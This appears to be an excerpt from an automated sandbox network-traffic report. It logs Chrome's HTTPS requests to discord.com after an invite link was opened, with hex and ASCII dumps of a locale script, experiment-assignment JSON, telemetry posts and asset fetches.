                                                                                                                                                                                                                                                                                    Data Ascii: "use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["88577"],{772416:function(i,a,o){o.r(a),a.default=JSON.parse('{"ofazSU":"Entendido","KUFsLi":"\xa1El cambio fue hecho!","yQfLwM":"Discord est\xe1 configurado en Espa\xf1ol
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:42 UTC105INData Raw: 64 20 65 6e 20 45 73 70 61 5c 78 66 31 6f 6c 3f 22 2c 22 51 6b 47 4d 50 7a 22 3a 22 53 5c 78 65 64 22 2c 22 6a 4d 37 73 55 6c 22 3a 22 4e 6f 22 7d 27 29 7d 7d 5d 29 3b 0a 2f 2f 23 20 73 6f 75 72 63 65 4d 61 70 70 69 6e 67 55 52 4c 3d 30 61 35 32 63 36 31 34 32 30 39 34 33 38 37 66 63 65 65 64 2e 6a 73 2e 6d 61 70
                                                                                                                                                                                                                                                                                    Data Ascii: d en Espa\xf1ol?","QkGMPz":"S\xed","jM7sUl":"No"}')}}]);//# sourceMappingURL=0a52c6142094387fceed.js.map


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    63192.168.2.549789162.159.137.2324437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:42 UTC689OUTGET /api/v9/experiments?with_guild_experiments=true HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: discord.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:42 UTC766INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:42 GMT
                                                                                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                    vary: Accept-Encoding
                                                                                                                                                                                                                                                                                    via: 1.1 google
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    CF-Cache-Status: BYPASS
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4ywSrSDE2sbCwqP4aVA4tD5hmJEeeeDGGzK4jpY2boz284ikCtdKS7ENbUiB3EeDZPccgSFISQhYoPW%2FMkZmR9Pq9SXEP0qaB1oOyW4zr9A0mcRcgyFtLKlgkzFl"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    CF-RAY: 8e73d0cd5bd141ec-EWR
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:42 UTC603INData Raw: 37 31 66 39 0d 0a 7b 22 66 69 6e 67 65 72 70 72 69 6e 74 22 3a 22 31 33 30 39 39 37 34 39 33 34 33 36 35 34 30 35 32 32 38 2e 6f 53 4a 57 52 77 4f 32 51 72 71 47 39 4b 49 55 76 6e 63 71 57 4f 74 4a 56 49 6b 22 2c 22 61 73 73 69 67 6e 6d 65 6e 74 73 22 3a 5b 5b 32 38 31 30 32 30 35 34 38 37 2c 31 2c 31 2c 2d 31 2c 33 2c 31 35 34 33 2c 30 2c 30 5d 2c 5b 32 36 31 37 32 31 38 34 34 34 2c 34 2c 31 2c 2d 31 2c 32 2c 34 39 31 2c 30 2c 30 5d 2c 5b 33 30 33 35 36 37 34 37 36 37 2c 30 2c 31 2c 2d 31 2c 30 2c 37 31 30 36 2c 30 2c 30 5d 2c 5b 31 36 30 39 37 38 32 31 35 31 2c 30 2c 31 2c 2d 31 2c 32 2c 38 33 37 38 2c 30 2c 30 5d 2c 5b 33 36 34 33 33 36 32 37 35 31 2c 30 2c 31 2c 2d 31 2c 30 2c 37 31 39 33 2c 30 2c 30 5d 2c 5b 33 37 35 33 30 33 34 34 36 36 2c 31 2c 32
                                                                                                                                                                                                                                                                                    Data Ascii: 71f9{"fingerprint":"1309974934365405228.oSJWRwO2QrqG9KIUvncqWOtJVIk","assignments":[[2810205487,1,1,-1,3,1543,0,0],[2617218444,4,1,-1,2,491,0,0],[3035674767,0,1,-1,0,7106,0,0],[1609782151,0,1,-1,2,8378,0,0],[3643362751,0,1,-1,0,7193,0,0],[3753034466,1,2
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:42 UTC1369INData Raw: 2c 30 2c 30 5d 2c 5b 32 34 39 31 30 30 35 30 31 39 2c 34 2c 31 2c 2d 31 2c 30 2c 32 37 36 32 2c 30 2c 30 5d 2c 5b 33 38 38 39 30 37 37 38 30 34 2c 32 2c 31 2c 2d 31 2c 30 2c 35 31 33 39 2c 30 2c 30 5d 2c 5b 34 30 37 39 32 31 34 33 31 39 2c 32 2c 31 2c 2d 31 2c 30 2c 32 34 34 33 2c 30 2c 30 5d 2c 5b 31 30 33 34 36 36 31 33 30 36 2c 30 2c 31 2c 2d 31 2c 30 2c 38 32 34 36 2c 30 2c 30 5d 2c 5b 38 32 38 32 35 31 37 31 30 2c 32 2c 31 2c 2d 31 2c 31 2c 33 37 32 32 2c 30 2c 30 5d 2c 5b 33 31 32 34 30 30 33 33 31 36 2c 31 2c 31 2c 2d 31 2c 30 2c 33 32 34 33 2c 30 2c 30 5d 2c 5b 32 36 37 36 33 34 38 35 30 36 2c 30 2c 31 2c 2d 31 2c 30 2c 31 31 34 31 2c 30 2c 30 5d 2c 5b 34 31 33 36 35 37 34 38 30 32 2c 30 2c 31 2c 2d 31 2c 31 2c 32 35 36 31 2c 30 2c 30 5d 2c 5b 34
                                                                                                                                                                                                                                                                                    Data Ascii: ,0,0],[2491005019,4,1,-1,0,2762,0,0],[3889077804,2,1,-1,0,5139,0,0],[4079214319,2,1,-1,0,2443,0,0],[1034661306,0,1,-1,0,8246,0,0],[828251710,2,1,-1,1,3722,0,0],[3124003316,1,1,-1,0,3243,0,0],[2676348506,0,1,-1,0,1141,0,0],[4136574802,0,1,-1,1,2561,0,0],[4
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:42 UTC1369INData Raw: 32 2c 2d 31 2c 30 2c 37 37 36 37 2c 30 2c 30 5d 2c 5b 31 38 38 34 34 32 36 34 37 31 2c 30 2c 31 2c 2d 31 2c 30 2c 32 39 32 2c 30 2c 30 5d 2c 5b 33 32 30 35 30 32 37 35 35 36 2c 30 2c 31 2c 2d 31 2c 32 2c 38 38 34 39 2c 30 2c 30 5d 2c 5b 32 37 39 31 38 32 37 32 36 33 2c 32 2c 31 2c 2d 31 2c 30 2c 31 37 37 33 2c 30 2c 30 5d 2c 5b 38 36 38 30 38 38 35 34 35 2c 30 2c 31 2c 2d 31 2c 30 2c 37 35 30 34 2c 30 2c 30 5d 2c 5b 31 37 39 34 38 30 31 38 39 31 2c 30 2c 35 2c 2d 31 2c 30 2c 31 37 39 34 2c 30 2c 30 5d 2c 5b 33 33 38 32 30 33 36 36 39 36 2c 33 2c 35 2c 2d 31 2c 34 2c 38 37 33 33 2c 30 2c 30 5d 2c 5b 31 33 32 30 30 37 36 37 35 33 2c 30 2c 31 2c 2d 31 2c 30 2c 32 30 2c 30 2c 30 5d 2c 5b 38 32 35 36 31 38 32 30 38 2c 30 2c 31 2c 2d 31 2c 30 2c 32 34 30 31 2c
                                                                                                                                                                                                                                                                                    Data Ascii: 2,-1,0,7767,0,0],[1884426471,0,1,-1,0,292,0,0],[3205027556,0,1,-1,2,8849,0,0],[2791827263,2,1,-1,0,1773,0,0],[868088545,0,1,-1,0,7504,0,0],[1794801891,0,5,-1,0,1794,0,0],[3382036696,3,5,-1,4,8733,0,0],[1320076753,0,1,-1,0,20,0,0],[825618208,0,1,-1,0,2401,
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:42 UTC1369INData Raw: 39 2c 37 2c 31 2c 2d 31 2c 31 2c 31 39 39 36 2c 30 2c 30 5d 2c 5b 32 34 38 37 38 32 33 37 34 32 2c 35 2c 31 2c 2d 31 2c 30 2c 34 35 36 38 2c 30 2c 30 5d 2c 5b 32 37 32 36 37 38 39 30 39 30 2c 30 2c 31 2c 2d 31 2c 30 2c 33 36 34 39 2c 30 2c 30 5d 2c 5b 38 37 38 30 34 30 30 34 34 2c 31 2c 31 2c 2d 31 2c 30 2c 39 36 35 34 2c 30 2c 31 5d 2c 5b 31 36 35 38 33 32 34 33 33 39 2c 32 2c 31 2c 2d 31 2c 30 2c 33 39 38 35 2c 30 2c 30 5d 2c 5b 31 36 33 33 32 38 39 31 32 34 2c 30 2c 31 2c 2d 31 2c 32 2c 35 31 31 37 2c 30 2c 30 5d 2c 5b 31 37 30 35 36 37 31 32 32 35 2c 30 2c 31 2c 2d 31 2c 30 2c 35 34 34 30 2c 30 2c 30 5d 2c 5b 34 37 34 31 35 39 36 31 36 2c 31 2c 31 2c 2d 31 2c 30 2c 39 31 38 2c 30 2c 30 5d 2c 5b 32 35 35 38 39 39 30 30 32 38 2c 30 2c 31 2c 2d 31 2c 30
                                                                                                                                                                                                                                                                                    Data Ascii: 9,7,1,-1,1,1996,0,0],[2487823742,5,1,-1,0,4568,0,0],[2726789090,0,1,-1,0,3649,0,0],[878040044,1,1,-1,0,9654,0,1],[1658324339,2,1,-1,0,3985,0,0],[1633289124,0,1,-1,2,5117,0,0],[1705671225,0,1,-1,0,5440,0,0],[474159616,1,1,-1,0,918,0,0],[2558990028,0,1,-1,0
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:42 UTC1369INData Raw: 31 34 30 39 39 2c 30 2c 31 2c 2d 31 2c 30 2c 35 39 34 39 2c 30 2c 30 5d 2c 5b 31 38 30 30 32 35 32 38 35 37 2c 30 2c 31 2c 2d 31 2c 31 2c 31 35 31 35 2c 30 2c 30 5d 2c 5b 32 36 32 32 35 30 32 37 34 38 2c 30 2c 31 2c 2d 31 2c 30 2c 36 34 33 31 2c 30 2c 30 5d 2c 5b 33 32 35 34 37 32 36 31 39 39 2c 31 2c 31 2c 2d 31 2c 30 2c 31 34 32 31 2c 30 2c 31 5d 2c 5b 31 36 32 34 35 37 37 38 39 33 2c 30 2c 31 2c 2d 31 2c 30 2c 34 35 37 33 2c 30 2c 30 5d 2c 5b 32 33 32 37 33 38 30 33 31 36 2c 33 2c 32 2c 30 2c 32 2c 37 39 36 35 2c 30 2c 30 5d 2c 5b 33 31 37 32 33 35 38 38 32 30 2c 33 2c 31 2c 2d 31 2c 30 2c 36 39 33 39 2c 30 2c 31 5d 5d 2c 22 67 75 69 6c 64 5f 65 78 70 65 72 69 6d 65 6e 74 73 22 3a 5b 5b 31 34 30 35 38 33 31 39 35 35 2c 22 32 30 32 31 2d 30 36 5f 67 75
                                                                                                                                                                                                                                                                                    Data Ascii: 14099,0,1,-1,0,5949,0,0],[1800252857,0,1,-1,1,1515,0,0],[2622502748,0,1,-1,0,6431,0,0],[3254726199,1,1,-1,0,1421,0,1],[1624577893,0,1,-1,0,4573,0,0],[2327380316,3,2,0,2,7965,0,0],[3172358820,3,1,-1,0,6939,0,1]],"guild_experiments":[[1405831955,"2021-06_gu
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:42 UTC1369INData Raw: 5b 5b 32 36 39 30 37 35 32 31 35 36 2c 37 37 30 31 33 39 33 30 31 5d 2c 5b 31 39 38 32 38 30 34 31 32 31 2c 31 30 30 30 30 5d 5d 5d 5d 5d 2c 5b 5b 5b 2d 31 2c 5b 7b 22 73 22 3a 30 2c 22 65 22 3a 31 30 30 30 30 7d 5d 5d 5d 2c 5b 5d 5d 5d 2c 5b 5d 2c 5b 5b 5b 5b 5b 31 2c 5b 7b 22 73 22 3a 30 2c 22 65 22 3a 31 30 30 30 30 7d 5d 5d 5d 2c 5b 5b 31 36 30 34 36 31 32 30 34 35 2c 5b 5b 31 31 38 33 32 35 31 32 34 38 2c 5b 22 47 55 49 4c 44 5f 52 4f 4c 45 5f 53 55 42 53 43 52 49 50 54 49 4f 4e 5f 54 52 49 41 4c 53 22 5d 5d 5d 5d 5d 5d 5d 5d 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 30 2c 30 5d 2c 5b 33 38 33 32 31 31 33 32 30 32 2c 6e 75 6c 6c 2c 34 2c 5b 5b 5b 5b 2d 31 2c 5b 7b 22 73 22 3a 30 2c 22 65 22 3a 31 30 30 30 30 7d 5d 5d 5d 2c 5b 5d 5d 5d 2c 5b 7b 22 62 22 3a 30
                                                                                                                                                                                                                                                                                    Data Ascii: [[2690752156,770139301],[1982804121,10000]]]]],[[[-1,[{"s":0,"e":10000}]]],[]]],[],[[[[[1,[{"s":0,"e":10000}]]],[[1604612045,[[1183251248,["GUILD_ROLE_SUBSCRIPTION_TRIALS"]]]]]]]],null,null,0,0],[3832113202,null,4,[[[[-1,[{"s":0,"e":10000}]]],[]]],[{"b":0
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:42 UTC1369INData Raw: 31 2c 5b 7b 22 73 22 3a 30 2c 22 65 22 3a 31 30 30 30 30 7d 5d 5d 5d 2c 5b 5d 5d 5d 2c 5b 7b 22 62 22 3a 36 2c 22 6b 22 3a 5b 22 39 30 38 31 31 34 33 39 32 32 36 33 30 34 39 32 37 37 22 2c 22 34 34 33 35 38 34 38 37 37 38 32 39 35 35 34 31 37 37 22 2c 22 32 32 33 30 37 30 34 36 39 31 34 38 39 30 31 33 37 36 22 2c 22 32 32 34 35 36 35 38 33 36 32 37 37 34 38 31 34 37 33 22 2c 22 34 38 38 34 34 34 38 37 39 38 33 36 34 31 33 39 37 35 22 2c 22 37 35 36 36 34 34 31 37 36 36 31 30 37 32 31 38 34 32 22 5d 7d 5d 2c 5b 5d 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 30 2c 30 5d 2c 5b 33 36 38 33 30 36 33 36 34 39 2c 6e 75 6c 6c 2c 30 2c 5b 5b 5b 5b 31 2c 5b 7b 22 73 22 3a 30 2c 22 65 22 3a 31 30 30 30 30 7d 5d 5d 5d 2c 5b 5b 31 36 30 34 36 31 32 30 34 35 2c 5b 5b 31 31 38 33
                                                                                                                                                                                                                                                                                    Data Ascii: 1,[{"s":0,"e":10000}]]],[]]],[{"b":6,"k":["908114392263049277","443584877829554177","223070469148901376","224565836277481473","488444879836413975","756644176610721842"]}],[],null,null,0,0],[3683063649,null,0,[[[[1,[{"s":0,"e":10000}]]],[[1604612045,[[1183
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:42 UTC1369INData Raw: 73 22 3a 36 30 30 30 2c 22 65 22 3a 38 30 30 30 7d 5d 5d 5d 2c 5b 5b 31 36 30 34 36 31 32 30 34 35 2c 5b 5b 31 31 38 33 32 35 31 32 34 38 2c 5b 22 43 4f 4d 4d 55 4e 49 54 59 5f 45 58 50 5f 4c 41 52 47 45 5f 55 4e 47 41 54 45 44 22 5d 5d 5d 5d 5d 5d 2c 5b 5b 5b 2d 31 2c 5b 7b 22 73 22 3a 30 2c 22 65 22 3a 32 30 30 30 7d 2c 7b 22 73 22 3a 38 30 30 30 2c 22 65 22 3a 31 30 30 30 30 7d 5d 5d 2c 5b 31 2c 5b 7b 22 73 22 3a 34 30 30 30 2c 22 65 22 3a 36 30 30 30 7d 5d 5d 2c 5b 32 2c 5b 7b 22 73 22 3a 36 30 30 30 2c 22 65 22 3a 38 30 30 30 7d 5d 5d 5d 2c 5b 5b 31 36 30 34 36 31 32 30 34 35 2c 5b 5b 31 31 38 33 32 35 31 32 34 38 2c 5b 22 43 4f 4d 4d 55 4e 49 54 59 5f 45 58 50 5f 4c 41 52 47 45 5f 47 41 54 45 44 22 5d 5d 5d 5d 5d 5d 5d 2c 5b 5d 2c 5b 5d 2c 6e 75 6c
                                                                                                                                                                                                                                                                                    Data Ascii: s":6000,"e":8000}]]],[[1604612045,[[1183251248,["COMMUNITY_EXP_LARGE_UNGATED"]]]]]],[[[-1,[{"s":0,"e":2000},{"s":8000,"e":10000}]],[1,[{"s":4000,"e":6000}]],[2,[{"s":6000,"e":8000}]]],[[1604612045,[[1183251248,["COMMUNITY_EXP_LARGE_GATED"]]]]]]],[],[],nul
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:42 UTC1369INData Raw: 5d 5d 2c 5b 5b 5b 31 2c 5b 7b 22 73 22 3a 30 2c 22 65 22 3a 31 30 30 30 30 7d 5d 5d 5d 2c 5b 5b 33 30 31 33 37 37 31 38 33 38 2c 5b 5b 33 30 31 33 37 37 31 38 33 38 2c 5b 22 38 38 35 34 31 38 31 35 38 37 38 38 33 34 35 38 39 37 22 5d 5d 5d 5d 5d 5d 5d 5d 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 30 2c 30 5d 2c 5b 39 38 37 38 38 34 39 32 37 2c 22 32 30 32 32 2d 31 31 5f 63 72 65 61 74 6f 72 5f 6d 6f 6e 65 74 69 7a 61 74 69 6f 6e 5f 6f 6e 62 6f 61 72 64 69 6e 67 5f 77 61 69 74 6c 69 73 74 22 2c 30 2c 5b 5b 5b 5b 31 2c 5b 7b 22 73 22 3a 30 2c 22 65 22 3a 31 30 30 30 30 7d 5d 5d 5d 2c 5b 5b 32 32 39 34 38 38 38 39 34 33 2c 5b 5b 32 36 39 30 37 35 32 31 35 36 2c 39 38 37 38 38 34 39 32 37 5d 2c 5b 31 39 38 32 38 30 34 31 32 31 2c 31 30 30 30 30 5d 5d 5d 5d 5d 2c 5b 5b
                                                                                                                                                                                                                                                                                    Data Ascii: ]],[[[1,[{"s":0,"e":10000}]]],[[3013771838,[[3013771838,["885418158788345897"]]]]]]]],null,null,0,0],[987884927,"2022-11_creator_monetization_onboarding_waitlist",0,[[[[1,[{"s":0,"e":10000}]]],[[2294888943,[[2690752156,987884927],[1982804121,10000]]]]],[[
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:42 UTC1369INData Raw: 36 37 39 37 31 37 30 34 34 32 37 36 22 2c 22 31 30 35 33 30 31 38 31 32 32 35 33 31 31 32 37 34 34 38 22 2c 22 31 30 35 34 35 30 33 35 38 36 37 36 31 30 33 35 39 30 36 22 2c 22 38 37 36 39 31 38 34 31 32 33 36 39 30 38 38 35 38 32 22 2c 22 31 30 35 34 35 31 31 37 34 38 35 35 37 38 34 30 34 30 34 22 2c 22 31 30 35 34 35 31 32 34 31 34 37 30 39 37 38 38 38 34 32 22 2c 22 31 30 35 34 35 31 35 39 36 36 30 33 35 33 36 35 39 36 30 22 2c 22 31 30 35 34 35 36 35 39 35 30 37 35 39 38 39 39 31 37 36 22 2c 22 31 30 33 39 39 34 30 37 36 35 37 35 30 36 36 35 32 32 36 22 5d 7d 5d 2c 5b 5d 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 30 2c 30 5d 2c 5b 32 38 30 38 36 36 36 36 30 2c 6e 75 6c 6c 2c 30 2c 5b 5b 5b 5b 2d 31 2c 5b 7b 22 73 22 3a 30 2c 22 65 22 3a 31 30 30 30 30 7d 5d 5d
                                                                                                                                                                                                                                                                                    Data Ascii: 679717044276","1053018122531127448","1054503586761035906","876918412369088582","1054511748557840404","1054512414709788842","1054515966035365960","1054565950759899176","1039940765750665226"]}],[],null,null,0,0],[280866660,null,0,[[[[-1,[{"s":0,"e":10000}]]


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    64192.168.2.549787162.159.137.2324437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:42 UTC1679OUTPOST /api/v9/science HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: discord.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Content-Length: 722
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    X-Super-Properties: eyJvcyI6IldpbmRvd3MiLCJicm93c2VyIjoiQ2hyb21lIiwiZGV2aWNlIjoiIiwic3lzdGVtX2xvY2FsZSI6ImVuLVVTIiwiYnJvd3Nlcl91c2VyX2FnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExNy4wLjAuMCBTYWZhcmkvNTM3LjM2IiwiYnJvd3Nlcl92ZXJzaW9uIjoiMTE3LjAuMC4wIiwib3NfdmVyc2lvbiI6IjEwIiwicmVmZXJyZXIiOiIiLCJyZWZlcnJpbmdfZG9tYWluIjoiIiwicmVmZXJyZXJfY3VycmVudCI6IiIsInJlZmVycmluZ19kb21haW5fY3VycmVudCI6IiIsInJlbGVhc2VfY2hhbm5lbCI6InN0YWJsZSIsImNsaWVudF9idWlsZF9udW1iZXIiOjM0NzY5MSwiY2xpZW50X2V2ZW50X3NvdXJjZSI6bnVsbH0=
                                                                                                                                                                                                                                                                                    X-Fingerprint: 1309974925423153294.42Ce08a9wThnlRToTnNlmvvLUxI
                                                                                                                                                                                                                                                                                    X-Debug-Options: bugReporterEnabled
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    X-Discord-Timezone: America/New_York
                                                                                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                                                                                    X-Discord-Locale: en-US
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Origin: https://discord.com
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                    Referer: https://discord.com/invite/BNXa5rYFXM
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:42 UTC722OUTData Raw: 7b 22 65 76 65 6e 74 73 22 3a 5b 7b 22 74 79 70 65 22 3a 22 65 78 70 65 72 69 6d 65 6e 74 5f 75 73 65 72 5f 74 72 69 67 67 65 72 65 64 22 2c 22 66 69 6e 67 65 72 70 72 69 6e 74 22 3a 22 31 33 30 39 39 37 34 39 32 35 34 32 33 31 35 33 32 39 34 2e 34 32 43 65 30 38 61 39 77 54 68 6e 6c 52 54 6f 54 6e 4e 6c 6d 76 76 4c 55 78 49 22 2c 22 70 72 6f 70 65 72 74 69 65 73 22 3a 7b 22 63 6c 69 65 6e 74 5f 74 72 61 63 6b 5f 74 69 6d 65 73 74 61 6d 70 22 3a 31 37 33 32 33 39 32 37 36 30 33 32 35 2c 22 6e 61 6d 65 22 3a 22 32 30 32 33 2d 30 39 5f 72 65 64 65 73 69 67 6e 65 64 5f 69 63 6f 6e 73 5f 65 78 70 65 72 69 6d 65 6e 74 22 2c 22 72 65 76 69 73 69 6f 6e 22 3a 31 2c 22 70 6f 70 75 6c 61 74 69 6f 6e 22 3a 30 2c 22 62 75 63 6b 65 74 22 3a 31 2c 22 6c 6f 63 61 74 69
                                                                                                                                                                                                                                                                                    Data Ascii: {"events":[{"type":"experiment_user_triggered","fingerprint":"1309974925423153294.42Ce08a9wThnlRToTnNlmvvLUxI","properties":{"client_track_timestamp":1732392760325,"name":"2023-09_redesigned_icons_experiment","revision":1,"population":0,"bucket":1,"locati
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:42 UTC831INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:42 GMT
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    access-control-allow-origin: https://discord.com
                                                                                                                                                                                                                                                                                    vary: Origin, Access-Control-Request-Method, Access-Control-Request-Headers
                                                                                                                                                                                                                                                                                    via: 1.1 google
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qf%2F34yPmg%2B%2F%2FhDwa6j1Oljs6y3Y4zHl6dN5de3FpDPoy6vMWC1gBXKgcs1%2BFbAzYo5DRc0YbS%2FpCjaLrhmiVZZKPATOu3k5zm4FRmMoT3%2BCXxTRI6xHciZPj49tZ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    CF-RAY: 8e73d0cd684541f8-EWR


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    65192.168.2.549791162.159.137.2324437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:42 UTC862OUTGET /assets/09a6f112fcbc17f6cfd4.js HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: discord.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                    Referer: https://discord.com/invite/BNXa5rYFXM
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:42 UTC966INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:42 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                                    Content-Length: 238
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    CF-Ray: 8e73d0cdda8641ff-EWR
                                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
